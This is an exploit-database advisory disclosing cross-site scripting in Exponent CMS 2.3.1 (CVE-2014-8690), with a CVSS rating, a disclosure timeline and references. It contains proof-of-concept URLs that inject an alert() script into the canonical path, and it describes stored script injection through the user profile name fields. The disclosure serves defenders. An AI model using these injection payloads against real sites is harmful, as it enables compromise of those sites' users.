Multiple Exponent CMS Cross-Site Scripting Vulnerabilies

2015.02.22
Credit: Mayuresh Dani
Risk: Low
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

###################### # Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies # Discovered by- # Mayuresh Dani (mdani@qualys.com) # Narendra Shinde (nshinde@qualys.com) # Vendor Homepage: http://www.exponentcms.org/ # Software Link: http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download # Version: 2.3.1 # Date: 2014-10-11 # Tested on: Windows 7 / Mozilla Firefox # Ubuntu 14.04 / Mozilla Firefox # CVE: CVE-2014-8690 ###################### # Vulnerability Disclosure Timeline: # 2014-11-04: Discovered vulnerability # 2014-11-04: Vendor Notification # 2014-11-05: Vendor confirmation # 2014-11-06: Vendor fixes Universal XSS - http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0 # 2015-02-12: Public Disclosure ###################### # Description # Exponent CMS is a free, open source, open standards modular enterprise software framework and content management system (CMS) written in the PHP. # # CVE-2014-8690: # Universal XSS - Exponent CMS builds the canonical path field from an unsanitized URL, which can be used to execute arbitrary scripts. # Examples: # http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c # http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c # http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c # # 2.b. XSS in user profiles. # The "First Name" and "Last Name" fields on http://server/exponent/users/edituser are not sufficiently sanitized. Enter your favourite script and the application will execute it everytime for you. # # More information and PoCs - http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior # # # Thanks, # Mayuresh & Narendra

References:

http://osvdb.org/show/osvdb/118345
http://packetstormsecurity.com/files/130382/Exponent-CMS-2.3.1-Cross-Site-Scripting.html
http://www.exploit-db.com/exploits/36059
http://www.exponentcms.org/news/show/title/corrected-security-patches-released-for-v2-1-4-v2-2-3-and-v2-3-0
http://osvdb.org/show/osvdb/118263
http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior
http://xforce.iss.net/xforce/xfdb/100877


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top